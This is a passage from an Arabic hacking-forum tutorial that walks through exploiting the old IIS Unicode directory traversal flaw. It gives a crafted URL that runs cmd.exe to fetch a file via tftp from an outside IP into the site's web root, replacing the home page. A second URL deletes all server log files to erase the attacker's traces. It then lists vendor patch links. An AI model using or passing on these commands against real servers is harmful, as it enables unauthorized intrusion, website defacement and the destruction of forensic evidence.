index.htm هذه اسم الصفحة الى راح تتحمل وممكن تغيرها عاد بكيفك انت
C:\inetpub\wwwroot\ وهذا مكان تواجد الصفحة الرئيسة الخاصة بالموقع
index.htm هنا تكتب إسم الصفحة او الملف التي تريده أن يظهر في الموقع
C:\يجب التأكد من إنك حاط الصفحة المراد تحميلها في جهازك داخل الـ
index.htm ومثلا اسم الصفحة
قبل ماتضغط انتر عشان تنسخ الملف تاكد من ان الثغرة الان صارت مشابها لمثل هذه الثغرة
http://www.xxxxx.com/scripts/..ü€€€€¯../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+212.212.212.212+GET+index.htm+C:\inetpub\wwwroo t\index.htm
ولو طلعت مشابها لها اضغط إنتر وتوكل على الله
وبإذن الله راح يتنسخ الملف
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
وفى النقطة الاخيرة والاهم
مسح ملفات تكون تجمعت داخل الجهاز ومكونة معلومات عنك مثل الايبي
http://server/msadc/..&Agrave;¯../..&Agrave;¯../..&Agrave;¯../winnt/system32/cmd.exe?/c+del+c:\*.log
--------------------------------------
وهذه لنكات لكي تسد الثغرة داخل موقعك اذا كانت شغالة
Patches to repair this Bug:

IIS 4.0 on WinNT 4http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
IIS 5.0 on Win2000 http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
كيف تصبح هاكر محترف ... دروس من الالف الى الياء ...
الرجوع الى أعلى الصفحة 
صفحة 2 من اصل 2انتقل الى الصفحة : الصفحة السابقة  1, 2
 مواضيع مماثلة
-

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدي العفريت ::: ElaFreeT.Tk :: برامج :: برامج شقاوة-
انتقل الى: